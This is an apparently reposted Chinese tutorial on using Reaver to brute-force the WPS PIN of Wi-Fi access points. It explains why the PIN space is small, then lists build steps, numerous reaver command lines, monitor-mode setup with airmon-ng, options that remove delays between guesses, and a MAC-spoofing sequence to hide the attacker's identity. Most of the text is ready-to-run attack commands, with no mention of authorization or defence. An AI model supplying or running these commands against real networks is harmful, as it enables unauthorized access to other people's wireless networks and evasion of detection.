大家好,又见面了,我是你们的朋友全栈君。
Reaver是暴力破解接入点PIN码的一种工具。这里简单说明,PIN码是8位数字,且第8位是由校验和,由前7位可以推出。而前7位又分为4和3两部分,所以暴力尝试最多10000+1000=11000次即可完成,破解所需的时间通常在2-5小时。
Reaver只支持linux平台,需要libpcap和libsqlite库,可以下命令编译安装:
$ ./configure
$ make
# make install
卸载删除可使用命令;
# make distclean
# reaver -i mon0 -b 00:01:02:03:04:05
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
# reaver -i mon0 -b 00:01:02:03:04:05 --fixed
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
首先,开启monitor模式:
# airmon-ng start wlan0
使用reaver需要指定接入点MAC地址以及monitor接口名:
# reaver -i mon0 -b 00:01:02:03:04:05
或者使用-vv参数获得详细的进度信息:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
默认情况下,reaver的pin码尝试间隔为1秒,我们可以通过使用’-d 0‘参数来除去时间间隔。但是可能会使接入点出现问题:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
另一种加速攻击的方法是使用–dh-small。这个参数选项会使reaver尝试小的diffie-hellman密码,从而减轻接入点的计算负荷。
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
有时我们可能需要隐藏自己的MAC地址,reaver用-mac参数来支持此功能。注意:改变虚拟的monitor接口的MAC地址没有什么用,必须要改变物理接口的MAC地址,如:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/135901.html原文链接:https://javaforall.cn